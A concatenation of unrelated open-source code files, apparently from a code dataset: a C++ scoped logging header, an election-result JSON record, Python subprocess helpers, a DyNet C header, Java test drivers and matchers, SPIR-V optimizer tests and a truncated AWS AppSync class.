WINX_ASSERT( !m_scopes.empty() ); if (!m_scopes.empty()) { m_curr.assign(m_scopes.back()); m_scopes.pop_back(); } } void winx_call commit() { if (this->good()) { _LogTo log(*this); std::for_each(m_scopes.begin(), m_scopes.end(), log)(m_curr); } } public: void winx_call put(int ch) { m_curr.put(ch); } void winx_call putw(wint_t wch) { m_curr.putw(wch); } void winx_call put(size_t count, int ch) { m_curr.put(count, ch); } void winx_call putw(size_t count, wint_t wch) { m_curr.put(count, wch); } void winx_call put(const char* s, size_t count) { m_curr.put(s, count); } void winx_call put(const WCHAR* s, size_t count) { m_curr.put(s, count); } void winx_call putv(const char* fmt, va_list args) { m_curr.putv(fmt, args); } void winx_call putv(const WCHAR* fmt, va_list args) { m_curr.putv(fmt, args); } }; // ========================================================================= // class ScopeLog template <class StorageT> class ScopeLog : public Log< ScopeStorage<StorageT> > { protected: typedef Log< ScopeStorage<StorageT> > Base; using Base::m_stg; public: ScopeLog() {} template <class ArgT> ScopeLog(ArgT arg) : Base(arg) {} template <class ArgT1, class ArgT2> ScopeLog(ArgT1 arg1, ArgT2 arg2) : Base(arg1, arg2) {} void winx_call enterScope() { m_stg.enterScope(); } void winx_call leaveScope() { m_stg.leaveScope(); } void winx_call commit() { m_stg.commit(); } void winx_call traceScopeMessage( const char* scope, const char* operation, const char* file, int line) { trace("%s(%d): %s '%s'\n", file, line, operation, scope); } void winx_call reportGuardError( const char* general, const int error, const char* detail, const char* file, int line) { trace("%s(%d):\n\t%s[%d] - %s\n", file, line, general, error, detail); m_stg.commit(); } }; // ========================================================================= // class OutputScopeLog, ErrorScopeLog, FileScopeLog class OutputScopeLog : public ScopeLog<FILEStorage> { public: OutputScopeLog() : ScopeLog<FILEStorage>(stdout) {} }; class ErrorScopeLog : public ScopeLog<FILEStorage> { public: ErrorScopeLog() : ScopeLog<FILEStorage>(stderr) {} }; class FileScopeLog : public ScopeLog<FILEStorage> { public: FileScopeLog() {} template <class ArgT> FileScopeLog(ArgT szFile) : ScopeLog<FILEStorage>(szFile, false) { } ~FileScopeLog() { m_stg.commit(); m_stg.close(); } template <class ArgT> void winx_call open(ArgT szFile) { m_stg.open(szFile, false); } }; // ========================================================================= // class ThreadLog #pragma warning(disable:4996) // XXX was declared deprecated class ThreadLogName { public: static BOOL testAndCreateDir(LPCSTR szPath) { return ::CreateDirectoryA(szPath, NULL) || ::GetLastError() == ERROR_ALREADY_EXISTS; } static BOOL testAndCreateDir(LPCWSTR szPath) { return ::CreateDirectoryW(szPath, NULL) || ::GetLastError() == ERROR_ALREADY_EXISTS; } static LPCSTR winx_call make(LPSTR szFile) { ::GetModuleFileNameA(NULL, szFile, _MAX_PATH); SYSTEMTIME gmt; ::GetSystemTime(&gmt); LPSTR szFileName = ::PathFindExtensionA(szFile); sprintf( szFileName, "[%d-%d-%d][TID=%.4x].log", gmt.wYear, gmt.wMonth, gmt.wDay, GetCurrentThreadId()); return szFile; } }; #pragma warning(default:4996) // XXX was declared deprecated template <class LogT, class NameT = ThreadLogName> class ThreadLog { private: static __declspec(thread) LogT* s_log; public: typedef NameT NameMakerType; static void winx_call init() { TCHAR szFile[_MAX_PATH]; LogT* log = new LogT(NameT::make(szFile)); init(log); } static LogT* winx_call init(LogT* log) { LogT* old_log = s_log; s_log = log; return old_log; } static void winx_call term() { delete s_log; s_log = NULL; } static LogT& winx_call instance() { WINX_ASSERT(s_log != NULL); return *s_log; } }; template <class LogT, class NameT> LogT* ThreadLog<LogT, NameT>::s_log; // ------------------------------------------------------------------------- // class ThreadLogInit template <class LogT, class NameT = ThreadLogName> class ThreadLogInit { private: typedef ThreadLog<LogT, NameT> ThreadLogT; LogT m_log; LogT* m_old_log; public: ThreadLogInit() { TCHAR szFile[_MAX_PATH]; m_log.open(NameT::make(szFile)); m_old_log = ThreadLogT::init(&m_log); } ThreadLogInit(LPCSTR szFile) { m_log.open(szFile); m_old_log = ThreadLogT::init(&m_log); } ~ThreadLogInit() { ThreadLogT::init(m_old_log); } }; // ========================================================================= // class TestScopeLog template <class LogT> class TestScopeLog { WINX_TEST_SUITE(TestScopeLog); WINX_TEST(testBasic); WINX_TEST(testThreadLog); WINX_TEST(testThreadLogInit); WINX_TEST_SUITE_END(); public: void setUp() {} void tearDown() {} public: void testBasic(LogT& log) { log.newline(); OutputScopeLog slog; slog.print("message in global scope!!!"); slog.enterScope(); slog.print("message in level 1 scope!"); slog.enterScope(); slog.print("level 2 message"); slog.enterScope(); slog.print("level 3 message"); slog.commit(); slog.leaveScope(); slog.print("message discard!!!"); slog.leaveScope(); slog.commit(); slog.leaveScope(); slog.print("done!"); } struct _NameT { static LPCSTR make(LPSTR) { return "/__ThreadLog__.log"; } }; void testThreadLog(LogT& log) { typedef ThreadLog<FileScopeLog, _NameT> ThreadLogT; ThreadLogT::init(); FileScopeLog& slog = ThreadLogT::instance(); slog.print("message in global scope!!!"); slog.enterScope(); slog.print("message in level 1 scope!"); slog.enterScope(); slog.print("level 2 message"); slog.enterScope(); slog.print("level 3 message"); slog.commit(); slog.leaveScope(); slog.print("message discard!!!"); slog.leaveScope(); slog.commit(); slog.leaveScope(); slog.print("done!"); ThreadLogT::term(); } void testThreadLogInit(LogT& log) { ThreadLogInit<FileScopeLog> logInit("/__ThreadLogInit__.log"); FileScopeLog& slog = ThreadLog<FileScopeLog>::instance(); slog.print("message in global scope!!!"); slog.enterScope(); slog.print("message in level 1 scope!"); slog.enterScope(); slog.print("level 2 message"); slog.enterScope(); slog.print("level 3 message"); slog.commit(); slog.leaveScope(); slog.print("message discard!!!"); slog.leaveScope(); slog.commit(); slog.leaveScope(); slog.print("done!"); } }; // ========================================================================= // $Log: $ NS_STDEXT_END #endif /* STDEXT_SCOPEDBG_SCOPELOG_H */
4,403
348
{"nom":"Marzan","circ":"4ème circonscription","dpt":"Morbihan","inscrits":1738,"abs":896,"votants":842,"blancs":11,"nuls":3,"exp":828,"res":[{"nuance":"REM","nom":"<NAME>","voix":379},{"nuance":"LR","nom":"Mme <NAME>","voix":170},{"nuance":"FI","nom":"Mme <NAME>","voix":112},{"nuance":"FN","nom":"Mme <NAME>","voix":88},{"nuance":"ECO","nom":"Mme <NAME>","voix":40},{"nuance":"EXD","nom":"<NAME>","voix":14},{"nuance":"DLF","nom":"<NAME>","voix":13},{"nuance":"EXG","nom":"<NAME>","voix":5},{"nuance":"DVD","nom":"M. <NAME>","voix":4},{"nuance":"DIV","nom":"Mme <NAME>","voix":3},{"nuance":"ECO","nom":"Mme <NAME>","voix":0}]}
255
941
<reponame>3cL1p5e7/ic<gh_stars>100-1000 import asyncio import io import shlex import subprocess import sys from asyncio.subprocess import PIPE import yaml # Run command directly, without invoking a shell def run(command, **kwargs): return ( subprocess.run(shlex.split(command), capture_output=True, check=True, **kwargs) .stdout.decode("utf8") .rstrip("\n") ) # Run in a shell def run_in_shell(command, **kwargs): return ( subprocess.run(command, capture_output=True, check=True, shell=True, **kwargs) .stdout.decode("utf8") .rstrip("\n") ) # Run command in a Nix shell, returning stdout def run_in_nix_shell_quiet(command, shell_nix_path="shell.nix", **kwargs): p = subprocess.run( ["nix-shell", "--run", command, shell_nix_path], check=True, capture_output=True, **kwargs, ) return p.stdout.rstrip(b"\n") # Run command in a Nix shell, live dumping the output to stdout and stderr def run_in_nix_shell(command, shell_nix_path="shell.nix", **kwargs): # Subprocess runs with asyncio because we listen # on both stdout and stderr at the same time. # Without asyncio, we'd risk a deadlock in some cases async def nix_run(command, **kwargs): process = await asyncio.create_subprocess_exec( "nix-shell", "--run", command, shell_nix_path, stdout=PIPE, stderr=PIPE, **kwargs, ) # read child's stdout/stderr concurrently buf_out = io.StringIO() buf_err = io.StringIO() tasks = { asyncio.Task(process.stdout.read(1)): (buf_out, process.stdout, sys.stdout), asyncio.Task(process.stderr.read(1)): (buf_err, process.stderr, sys.stderr), } while tasks: done, _ = await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED) assert done for future in done: buf, stream, display = tasks.pop(future) line = future.result() if line: # not EOF line = line.decode("utf8") buf.write(line) # save line for later display.write(line) # write line to the stdout/stderr # schedule to read the next line tasks[asyncio.Task(stream.read(1))] = buf, stream, display rc = await process.wait() if rc: raise CommandError(command, buf_err.getvalue(), rc) return buf_out.getvalue().rstrip("\n") return asyncio.run(nix_run(command, **kwargs)) def yaml_dump_sorted_without_anchors(data): class NoAliasDumper(yaml.SafeDumper): def ignore_aliases(self, data): return True return yaml.dump(data, Dumper=NoAliasDumper, sort_keys=True) class CommandError(Exception): """Exception raised during command execution.""" def __init__(self, command, stderr, returncode): """Create a CommandError from a command execution results.""" self.command = command self.stderr = stderr self.returncode = returncode super().__init__(self.command, self.stderr, self.returncode) def __str__(self): """Convert the CommandError to the string representation.""" return f"Failed execution (rc={self.returncode}); STDERR:\n" + str(self.stderr)
1,542
3,307
<filename>contrib/c/dynet_c/softmax-builder.h #ifndef DYNET_C_SOFTMAX_BUILDER_H_ #define DYNET_C_SOFTMAX_BUILDER_H_ #include <dynet_c/define.h> #include <dynet_c/expr.h> #include <dynet_c/graph.h> #include <dynet_c/model.h> /** * Opaque type of SoftmaxBuilder. */ typedef struct dynetSoftmaxBuilder dynetSoftmaxBuilder_t; /** * Deletes the SoftmaxBuilder object. * @param builder Pointer of a handler. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetDeleteSoftmaxBuilder( dynetSoftmaxBuilder_t *builder); /** * Initializes the parameters in the computation graph. * @param builder Pointer of a handler. * @param h_0 Vector to initialize hidden layers at timestep 0. * @param n The number of `h_0` elements. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetResetSoftmaxBuilderGraph( dynetSoftmaxBuilder_t *builder, dynetComputationGraph_t *cg, DYNET_C_BOOL update); /** * Computes negative log probability of a class. * @param builder Pointer of a handler. * @param rep Vector expression. * @param classidx Class. * @param newobj Pointer to receive an Expression. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetApplySoftmaxBuilderNegLogSoftmaxOne( dynetSoftmaxBuilder_t *builder, const dynetExpression_t *rep, uint32_t classidx, dynetExpression_t **newobj); /** * Computes batched negative log probability of a class. * @param builder Pointer of a handler. * @param rep Vector expression (batched). * @param classidxs List of classes, one per batch element. * @param n Number of indices. * @param newobj Pointer to receive an Expression. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetApplySoftmaxBuilderNegLogSoftmax( dynetSoftmaxBuilder_t *builder, const dynetExpression_t *rep, const uint32_t *classidxs, size_t n, dynetExpression_t **newobj); /** * Samples from the softmax distribution. * @param builder Pointer of a handler. * @param rep Vector expression parametrizing the distribution. * @param retval Pointer to receive a sampled class. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSampleFromSoftmaxBuilder( dynetSoftmaxBuilder_t *builder, const dynetExpression_t *rep, uint32_t *retval); /** * Returns an Expression representing a vector the size of the number of * classes. * @param rep Vector expression parametrizing the distribution. * @param newobj Pointer to receive an Expression. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetGetSoftmaxBuilderFullLogDistribution( dynetSoftmaxBuilder_t *builder, const dynetExpression_t *rep, dynetExpression_t **newobj); /** * Returns the logits (before application of the softmax). * @param rep Vector expression parametrizing the distribution. * @param newobj Pointer to receive an Expression. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetGetSoftmaxBuilderFullLogits( dynetSoftmaxBuilder_t *builder, const dynetExpression_t *rep, dynetExpression_t **newobj); /** * Gets the ParameterCollection containing the softmax parameters. * @param builder Pointer of a handler. * @param newobj Pointer to receive the parameter collection. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetGetSoftmaxBuilderParameterCollection( dynetSoftmaxBuilder_t *builder, dynetParameterCollection_t **newobj); /** * Creates a new StandardSoftmaxBuilder object. * @param rep_dim Dimension of the input vectors. * @param num_classes Number of classes. * @param pc Parameter collection. * @param bias Whether to use a bias vector or not. * @param newobj Pointer to receive a handler. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetCreateStandardSoftmaxBuilder( uint32_t rep_dim, uint32_t num_classes, dynetParameterCollection_t *pc, DYNET_C_BOOL bias, dynetSoftmaxBuilder_t **newobj); /** * Creates a new StandardSoftmaxBuilder object with pre-existing parameters. * @param p_w Weight matrix. * @param p_b Bias vector (no bias is used if `p_b` is nullptr). * @param newobj Pointer to receive a handler. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetCreateStandardSoftmaxBuilderFromParameters( dynetParameter_t *p_w, dynetParameter_t *p_b, dynetSoftmaxBuilder_t **newobj); #endif // DYNET_C_SOFTMAX_BUILDER_H_
1,441
788
<gh_stars>100-1000 /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.usergrid.chop.runner.drivers; import java.util.concurrent.CountDownLatch; import java.util.concurrent.TimeUnit; import org.apache.usergrid.chop.api.Signal; import org.apache.usergrid.chop.api.TimeChop; /** * Runs a time constrained chop performance test. */ public class TimeDriver extends Driver<TimeTracker> { private final CountDownLatch latch; public TimeDriver( Class<?> testClass ) { super( new TimeTracker( testClass ) ); latch = new CountDownLatch( getTracker().getThreads() ); } @Override public void start() { synchronized ( lock ) { if ( state == State.READY ) { state = state.next( Signal.START ); executorService.submit( new Runnable() { @Override public void run() { LOG.info( "Started completion detection job." ); try { while ( latch.getCount() > 0 ) { latch.await( getTimeout(), TimeUnit.MILLISECONDS ); } } catch ( InterruptedException e ) { LOG.warn( "Awe snap! Someone woke me up early!", e ); } LOG.info( "All threads stopped processing. Time to stop tracker and complete." ); getTracker().stop(); state = state.next( Signal.COMPLETED ); lock.notifyAll(); } } ); final TimeChop timeChop = getTracker().getTimeChop(); for ( int ii = 0; ii < getTracker().getThreads(); ii++ ) { final int id = ii; executorService.submit( new Runnable() { @Override public void run() { long runTime; do { runTime = System.currentTimeMillis() - getTracker().getStartTime(); LOG.info( "Running for {} ms, will stop in {} ms", runTime, timeChop.time() - runTime ); // execute the tests and capture tracker getTracker().execute(); // if a delay between runs is requested apply it if ( timeChop.delay() > 0 ) { try { Thread.sleep( timeChop.delay() ); } catch ( InterruptedException e ) { LOG.warn( "Awe snap, someone woke me up early!" ); } } } while ( runTime < timeChop.time() && isRunning() ); latch.countDown(); LOG.info( "Thread {} completed, count down latch value = {}", id, latch.getCount() ); } } ); } } } } }
2,083
831
/* * The MIT License (MIT) * * Copyright (c) 2014-2019 <NAME> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included * in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ package org.takes.facets.hamcrest; import java.util.Collections; import org.hamcrest.MatcherAssert; import org.hamcrest.StringDescription; import org.hamcrest.core.IsEqual; import org.hamcrest.core.IsNot; import org.junit.jupiter.api.Test; import org.takes.Body; import org.takes.Request; import org.takes.rq.RqFake; /** * Test case for {@link HmBody}. * * @since 2.0 */ final class HmBodyTest { /** * HmRqBody can test if values of bodies are same. */ @Test void testsBodyValuesAreSame() { final String body = "Same"; MatcherAssert.assertThat( new RqFake( Collections.<String>emptyList(), body ), new HmBody<>(body) ); } /** * HmRqBody can test if values of bodies are different. */ @Test void testsBodyValuesAreDifferent() { MatcherAssert.assertThat( new RqFake( Collections.<String>emptyList(), "this" ), new IsNot<>(new HmBody<>("that")) ); } /** * HmRqBody can describe mismatch in readable way. */ @Test void describesMismatchInReadableWay() { final Request request = new RqFake( Collections.<String>emptyList(), "other" ); final HmBody<Body> matcher = new HmBody<>("some"); matcher.matchesSafely(request); final StringDescription description = new StringDescription(); matcher.describeMismatchSafely(request, description); MatcherAssert.assertThat( description.toString(), new IsEqual<>( "body was: [111, 116, 104, 101, 114]" ) ); } /** * HmBody can describe in readable way. * @todo #893:30min Continue removing static class Matchers. Use the * classes IdentityTest.java, PsAllTest.java, PsBasicDefaultTest.java, * PsChainTest.java, HmBodyTest.java, HmRqTextBodyTest.java, * HmRsStatusTest.java, and HmRsTextBodyTest.java as an example. */ @Test void describeToInReadableWay() { final Request request = new RqFake( Collections.<String>emptyList(), "one" ); final HmBody<Body> matcher = new HmBody<>("two"); matcher.matchesSafely(request); final StringDescription description = new StringDescription(); matcher.describeTo(description); MatcherAssert.assertThat( description.toString(), new IsEqual<>( "body: [116, 119, 111]" ) ); } }
1,517
13,885
// Copyright (c) 2017 Google Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include <string> #include "gmock/gmock.h" #include "source/opt/build_module.h" #include "source/opt/value_number_table.h" #include "test/opt/assembly_builder.h" #include "test/opt/pass_fixture.h" #include "test/opt/pass_utils.h" namespace spvtools { namespace opt { namespace { using ::testing::HasSubstr; using ::testing::MatchesRegex; using RedundancyEliminationTest = PassTest<::testing::Test>; // Test that it can get a simple case of local redundancy elimination. // The rest of the test check for extra functionality. TEST_F(RedundancyEliminationTest, RemoveRedundantLocalAdd) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %2 = OpFunction %3 None %4 %7 = OpLabel %8 = OpVariable %6 Function %9 = OpLoad %5 %8 %10 = OpFAdd %5 %9 %9 ; CHECK: OpFAdd ; CHECK-NOT: OpFAdd %11 = OpFAdd %5 %9 %9 OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } // Remove a redundant add across basic blocks. TEST_F(RedundancyEliminationTest, RemoveRedundantAdd) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %2 = OpFunction %3 None %4 %7 = OpLabel %8 = OpVariable %6 Function %9 = OpLoad %5 %8 %10 = OpFAdd %5 %9 %9 OpBranch %11 %11 = OpLabel ; CHECK: OpFAdd ; CHECK-NOT: OpFAdd %12 = OpFAdd %5 %9 %9 OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } // Remove a redundant add going through a multiple basic blocks. TEST_F(RedundancyEliminationTest, RemoveRedundantAddDiamond) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %7 = OpTypeBool %8 = OpConstantTrue %7 %2 = OpFunction %3 None %4 %9 = OpLabel %10 = OpVariable %6 Function %11 = OpLoad %5 %10 %12 = OpFAdd %5 %11 %11 ; CHECK: OpFAdd ; CHECK-NOT: OpFAdd OpBranchConditional %8 %13 %14 %13 = OpLabel OpBranch %15 %14 = OpLabel OpBranch %15 %15 = OpLabel %16 = OpFAdd %5 %11 %11 OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } // Remove a redundant add in a side node. TEST_F(RedundancyEliminationTest, RemoveRedundantAddInSideNode) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %7 = OpTypeBool %8 = OpConstantTrue %7 %2 = OpFunction %3 None %4 %9 = OpLabel %10 = OpVariable %6 Function %11 = OpLoad %5 %10 %12 = OpFAdd %5 %11 %11 ; CHECK: OpFAdd ; CHECK-NOT: OpFAdd OpBranchConditional %8 %13 %14 %13 = OpLabel OpBranch %15 %14 = OpLabel %16 = OpFAdd %5 %11 %11 OpBranch %15 %15 = OpLabel OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } // Remove a redundant add whose value is in the result of a phi node. TEST_F(RedundancyEliminationTest, RemoveRedundantAddWithPhi) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %7 = OpTypeBool %8 = OpConstantTrue %7 %2 = OpFunction %3 None %4 %9 = OpLabel %10 = OpVariable %6 Function %11 = OpLoad %5 %10 OpBranchConditional %8 %13 %14 %13 = OpLabel %add1 = OpFAdd %5 %11 %11 ; CHECK: OpFAdd OpBranch %15 %14 = OpLabel %add2 = OpFAdd %5 %11 %11 ; CHECK: OpFAdd OpBranch %15 %15 = OpLabel ; CHECK: OpPhi %phi = OpPhi %5 %add1 %13 %add2 %14 ; CHECK-NOT: OpFAdd %16 = OpFAdd %5 %11 %11 OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } // Keep the add because it is redundant on some paths, but not all paths. TEST_F(RedundancyEliminationTest, KeepPartiallyRedundantAdd) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %7 = OpTypeBool %8 = OpConstantTrue %7 %2 = OpFunction %3 None %4 %9 = OpLabel %10 = OpVariable %6 Function %11 = OpLoad %5 %10 OpBranchConditional %8 %13 %14 %13 = OpLabel %add = OpFAdd %5 %11 %11 OpBranch %15 %14 = OpLabel OpBranch %15 %15 = OpLabel %16 = OpFAdd %5 %11 %11 OpReturn OpFunctionEnd )"; auto result = SinglePassRunAndDisassemble<RedundancyEliminationPass>( text, /* skip_nop = */ true, /* do_validation = */ false); EXPECT_EQ(Pass::Status::SuccessWithoutChange, std::get<1>(result)); } // Keep the add. Even if it is redundant on all paths, there is no single id // whose definition dominates the add and contains the same value. TEST_F(RedundancyEliminationTest, KeepRedundantAddWithoutPhi) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %7 = OpTypeBool %8 = OpConstantTrue %7 %2 = OpFunction %3 None %4 %9 = OpLabel %10 = OpVariable %6 Function %11 = OpLoad %5 %10 OpBranchConditional %8 %13 %14 %13 = OpLabel %add1 = OpFAdd %5 %11 %11 OpBranch %15 %14 = OpLabel %add2 = OpFAdd %5 %11 %11 OpBranch %15 %15 = OpLabel %16 = OpFAdd %5 %11 %11 OpReturn OpFunctionEnd )"; auto result = SinglePassRunAndDisassemble<RedundancyEliminationPass>( text, /* skip_nop = */ true, /* do_validation = */ false); EXPECT_EQ(Pass::Status::SuccessWithoutChange, std::get<1>(result)); } // Test that it can get a simple case of local redundancy elimination // when it has OpenCL.DebugInfo.100 instructions. TEST_F(RedundancyEliminationTest, OpenCLDebugInfo100) { // When three redundant DebugValues exist, only one DebugValue must remain. const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "OpenCL.DebugInfo.100" %2 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %3 "main" OpExecutionMode %3 OriginUpperLeft OpSource GLSL 430 %4 = OpString "ps.hlsl" %5 = OpString "float" %6 = OpString "s0" %7 = OpString "main" %void = OpTypeVoid %9 = OpTypeFunction %void %float = OpTypeFloat 32 %uint = OpTypeInt 32 0 %uint_0 = OpConstant %uint 0 %uint_32 = OpConstant %uint 32 %_ptr_Function_float = OpTypePointer Function %float %15 = OpExtInst %void %1 DebugExpression %16 = OpExtInst %void %1 DebugSource %4 %17 = OpExtInst %void %1 DebugCompilationUnit 1 4 %16 HLSL %18 = OpExtInst %void %1 DebugTypeBasic %5 %uint_32 Float %19 = OpExtInst %void %1 DebugTypeVector %18 4 %20 = OpExtInst %void %1 DebugTypeFunction FlagIsProtected|FlagIsPrivate %19 %21 = OpExtInst %void %1 DebugFunction %7 %20 %16 4 1 %17 %7 FlagIsProtected|FlagIsPrivate 4 %3 ; CHECK: [[dbg_local_var:%\w+]] = OpExtInst %void {{%\w+}} DebugLocalVariable %22 = OpExtInst %void %1 DebugLocalVariable %6 %19 %16 0 0 %21 FlagIsLocal %14 = OpExtInst %void %1 DebugLocalVariable %6 %19 %16 0 0 %21 FlagIsLocal %3 = OpFunction %void None %9 %23 = OpLabel %24 = OpExtInst %void %1 DebugScope %21 %25 = OpVariable %_ptr_Function_float Function %26 = OpLoad %float %25 OpLine %4 0 0 ; Two `OpFAdd %float %26 %26` are the same. One must be removed. ; After removing one `OpFAdd %float %26 %26`, two DebugValues are the same. ; One must be removed. ; ; CHECK: OpLine {{%\w+}} 0 0 ; CHECK-NEXT: [[add:%\w+]] = OpFAdd %float [[value:%\w+]] ; CHECK-NEXT: DebugValue [[dbg_local_var]] [[add]] ; CHECK-NEXT: OpLine {{%\w+}} 1 0 ; CHECK-NEXT: OpFAdd %float [[add]] [[value]] ; CHECK-NEXT: OpReturn %27 = OpFAdd %float %26 %26 %28 = OpExtInst %void %1 DebugValue %22 %27 %15 %uint_0 OpLine %4 1 0 %29 = OpFAdd %float %26 %26 %30 = OpExtInst %void %1 DebugValue %14 %29 %15 %uint_0 %31 = OpExtInst %void %1 DebugValue %22 %29 %15 %uint_0 %32 = OpFAdd %float %29 %26 %33 = OpFAdd %float %27 %26 OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } TEST_F(RedundancyEliminationTest, FunctionDeclaration) { // Make sure the pass works with a function declaration that is called. const std::string text = R"(OpCapability Addresses OpCapability Linkage OpCapability Kernel OpCapability Int8 %1 = OpExtInstImport "OpenCL.std" OpMemoryModel Physical64 OpenCL OpEntryPoint Kernel %2 "_Z23julia__1166_kernel_77094Bool" OpExecutionMode %2 ContractionOff OpSource Unknown 0 OpDecorate %3 LinkageAttributes "julia_error_7712" Import %void = OpTypeVoid %5 = OpTypeFunction %void %3 = OpFunction %void None %5 OpFunctionEnd %2 = OpFunction %void None %5 %6 = OpLabel %7 = OpFunctionCall %void %3 OpReturn OpFunctionEnd )"; SinglePassRunAndCheck<RedundancyEliminationPass>(text, text, false); } } // namespace } // namespace opt } // namespace spvtools
5,959
17,703
namespace Envoy { // Directly calling waitFor on a condvar no good; need to inject TimeSystem. int waiting() { return condvar.waitFor(mutex, duration); } } // namespace Envoy
55
1,178
#ifndef _NET_PPP_DEFS_H #define _NET_PPP_DEFS_H 1 #define __need_time_t #include <time.h> #include <asm/types.h> #include <linux/ppp_defs.h> #endif /* net/ppp_defs.h */
87
3,372
/* * Copyright 2016-2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.appsync.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.protocol.StructuredPojo; import com.amazonaws.protocol.ProtocolMarshaller; /** * <p> * A <code>LambdaAuthorizerConfig</code> holds configuration on how to authorize AppSync API access when using the * <code>AWS_LAMBDA</code> authorizer mode. Be aware that an AppSync API may have only one Lambda authorizer configured * at a time. * </p> * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/appsync-2017-07-25/LambdaAuthorizerConfig" target="_top">AWS API * Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class 